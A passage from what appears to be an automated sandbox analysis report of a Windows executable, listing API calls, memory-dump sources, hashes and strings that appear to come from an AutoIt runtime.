                                                          • GetWindowRect.USER32(00000004,?), ref: 003BB0F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
                                                          • Instruction ID: b4b482d3f0c820d0921c4ec5cbb9600f50391e2aa72949d9f4bbd9d0bd594607
                                                          • Opcode Fuzzy Hash: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
                                                          • Instruction Fuzzy Hash: 5081CF711083059FDB12DF14C881BFAB7E8EF44718F04856AFE858A095DB74DE45CB61
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • DragQueryPoint.SHELL32(?,?), ref: 003EC627
                                                            • Part of subcall function 003EAB37: ClientToScreen.USER32(?,?), ref: 003EAB60
                                                            • Part of subcall function 003EAB37: GetWindowRect.USER32(?,?), ref: 003EABD6
                                                            • Part of subcall function 003EAB37: PtInRect.USER32(?,?,003EC014), ref: 003EABE6
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003EC690
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003EC69B
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003EC6BE
                                                          • _wcscat.LIBCMT ref: 003EC6EE
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003EC705
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003EC71E
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 003EC735
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 003EC757
                                                          • DragFinish.SHELL32(?), ref: 003EC75E
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003EC851
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbB
                                                          • API String ID: 169749273-33125029
                                                          • Opcode ID: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
                                                          • Instruction ID: ea5b79ec9e6f17c6e3483cf75f10191c6b496df521f3720c933e7497498c47fa
                                                          • Opcode Fuzzy Hash: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
                                                          • Instruction Fuzzy Hash: 52616C71108341AFC712EF64DC85DAFBBE8EF89710F404A2EF5919A1E1DB709A49CB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
                                                          • Instruction ID: f46f47d4be9a719d5b68257263f4a9d7883749c7063fff4da03bae8a0f8a7dfc
                                                          • Opcode Fuzzy Hash: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
                                                          • Instruction Fuzzy Hash: EA310431A88A09A7CA12FA50DD03FEE7BB49F10794F70402AF541BA4D5EF656F048656
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 003D5013
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 003D501E
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 003D5029
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 003D5034
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 003D503F
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 003D504A
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 003D5055
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 003D5060
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 003D506B
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 003D5076
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 003D5081
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 003D508C
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 003D5097
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 003D50A2
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 003D50AD
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003D50B8
                                                          • GetCursorInfo.USER32(?), ref: 003D50C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
                                                          • Instruction ID: b294713da227265ecbecd523568f8528cac6d83a90b62e7c538f65537a7cbc70
                                                          • Opcode Fuzzy Hash: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
                                                          • Instruction Fuzzy Hash: A33113B1D48319AADF119FB69C8996FBFECFF04750F50452BA50CE7280DA78A5048F91
                                                          APIs
                                                          • _memset.LIBCMT ref: 003EA259
                                                          • DestroyWindow.USER32(?,?), ref: 003EA2D3
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003EA34D
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003EA36F
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA382
                                                          • DestroyWindow.USER32(00000000), ref: 003EA3A4
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00360000,00000000), ref: 003EA3DB
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA3F4
                                                          • GetDesktopWindow.USER32 ref: 003EA40D
                                                          • GetWindowRect.USER32(00000000), ref: 003EA414
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003EA42C
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003EA444
                                                            • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
                                                          • Instruction ID: 0c9f47ef533fd2e3b1a9f1444ca26df84b0923b839090c3036680a9488225e17
                                                          • Opcode Fuzzy Hash: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
                                                          • Instruction Fuzzy Hash: FA719D70140684AFD722DF29CC49F667BE9FB88304F45462DF9859B2E0C7B4E902CB56
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 003E4424
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E446F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
                                                          • Instruction ID: a3c21903c3770ffb72aae5cac2318d288445a338e13b09047dbda6be7b6b34b7
                                                          • Opcode Fuzzy Hash: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
                                                          • Instruction Fuzzy Hash: B091AB746003108FCB0AEF11C452AAEB7E5AF99354F058969F8965F7E2CB34ED49CB81
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003EB8B4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003E91C2), ref: 003EB910
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB949
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003EB98C
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB9C3
                                                          • FreeLibrary.KERNEL32(?), ref: 003EB9CF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003EB9DF
                                                          • DestroyIcon.USER32(?,?,?,?,?,003E91C2), ref: 003EB9EE
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003EBA0B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003EBA17
                                                            • Part of subcall function 00382EFD: __wcsicmp_l.LIBCMT ref: 00382F86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
                                                          • Instruction ID: ba2e5571981742d7de27db7519ab3c54047ea8a525ba8d311e345a486cf4a3d8
                                                          • Opcode Fuzzy Hash: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
                                                          • Instruction Fuzzy Hash: 7461C071500269BFEB16DF65CC81FBBB7ACEB08710F108216F915DA1D1DBB4A980DBA0
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 003CDCDC
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003CDCEC
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003CDCF8
                                                          • __wsplitpath.LIBCMT ref: 003CDD56
                                                          • _wcscat.LIBCMT ref: 003CDD6E
                                                          • _wcscat.LIBCMT ref: 003CDD80
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDD95
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDA9
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDDB
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDFC
                                                          • _wcscpy.LIBCMT ref: 003CDE08
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003CDE47
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
                                                          • Instruction ID: 63eb0c0c7a0c361ae459d3cdb654d8b8839f391e8278b833a96d59a02ade4d08
                                                          • Opcode Fuzzy Hash: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
                                                          • Instruction Fuzzy Hash: D06159765042459FCB11EF60C844EAEB3E8BF89314F04892EF999CB251DB71ED45CB92
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003C9C7F
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003C9CA0
                                                          • __swprintf.LIBCMT ref: 003C9CF9
                                                          • __swprintf.LIBCMT ref: 003C9D12
                                                          • _wprintf.LIBCMT ref: 003C9DB9
                                                          • _wprintf.LIBCMT ref: 003C9DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
                                                          • Instruction ID: 6b216ffa711c790f23f49b5a254fc7afdf0b033c1b4401397eb3c7399335a6bb
                                                          • Opcode Fuzzy Hash: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
                                                          • Instruction Fuzzy Hash: D4517232900509AACF16FBE0CD46EEEB778AF14304F60406AF505B61A1DB352F59DF65
                                                          APIs
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • CharLowerBuffW.USER32(?,?), ref: 003CA3CB
                                                          • GetDriveTypeW.KERNEL32 ref: 003CA418
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA460
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA497
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA4C5
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: 92405b2ecfdb4ca765f022be9bb20a8bd737eb0668229cb02bbd2338bd909cfb
                                                          • Instruction ID: 845767d8fdf54337c6f80f7134c570832cf736c1ed9a3076188f922fd455bcdb
                                                          • Opcode Fuzzy Hash: 92405b2ecfdb4ca765f022be9bb20a8bd737eb0668229cb02bbd2338bd909cfb
                                                          • Instruction Fuzzy Hash: EB517E711047049FC705EF21C881D6AB3E8FF98758F50896DF89A9B2A1DB71ED09CB52
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003BF8DF
                                                          • LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF8E8
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003BF90A
                                                          • LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF90D
                                                          • __swprintf.LIBCMT ref: 003BF95D
                                                          • __swprintf.LIBCMT ref: 003BF96E
                                                          • _wprintf.LIBCMT ref: 003BFA17
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003BFA2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: a7e8b8beea2cd33cb9d7b9a3d9ed50d2d0e904fe38e9ddfaa6a98764625ef808
                                                          • Instruction ID: 4f1320faf510fe58d7d0e4d0fb015e85ce04d4582fb347b5b0f466d43973ea45
                                                          • Opcode Fuzzy Hash: a7e8b8beea2cd33cb9d7b9a3d9ed50d2d0e904fe38e9ddfaa6a98764625ef808
                                                          • Instruction Fuzzy Hash: 94414F7280020DAACF16FBE0DD86EEEB778AF14304F504065F605BA096EB756F49CB61
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003E9207,?,?), ref: 003EBA56
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA6D
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA78
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA85
                                                          • GlobalLock.KERNEL32(00000000), ref: 003EBA8E
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA9D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003EBAA6
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBAAD
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBABE
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,003F2CAC,?), ref: 003EBAD7
                                                          • GlobalFree.KERNEL32(00000000), ref: 003EBAE7
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 003EBB0B
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003EBB36
                                                          • DeleteObject.GDI32(00000000), ref: 003EBB5E
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003EBB74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 1264087974062c1a00af0fc93c5968f51abd941c5a72351876d860e96a9fa45c
                                                          • Instruction ID: 0235d1cf4e1bcb3e1ae1539c16f163627d166b6937a1311645b755cb46bdf555
                                                          • Opcode Fuzzy Hash: 1264087974062c1a00af0fc93c5968f51abd941c5a72351876d860e96a9fa45c
                                                          • Instruction Fuzzy Hash: 09413B75500259EFDB239F66DC88EABBBBCEB89711F114268F905DB2A0D7709901CB60
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 003CDA10
                                                          • _wcscat.LIBCMT ref: 003CDA28
                                                          • _wcscat.LIBCMT ref: 003CDA3A
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDA4F
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDA63
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003CDA7B
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 003CDA95
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDAA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: a7dc5b1ce00cddbd85c53ba745e1af958dec1878d10f02184ac40d6122d6e432
                                                          • Instruction ID: 38349f71ff5e21c6f6c9e022378b1956485782a0fb3d6b11b44d5d3bb4f56507
                                                          • Opcode Fuzzy Hash: a7dc5b1ce00cddbd85c53ba745e1af958dec1878d10f02184ac40d6122d6e432
                                                          • Instruction Fuzzy Hash: B8814C765043419FCB66EF64C884E6AB7E8AB89310F15893EF889CB251E730ED45CB52
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
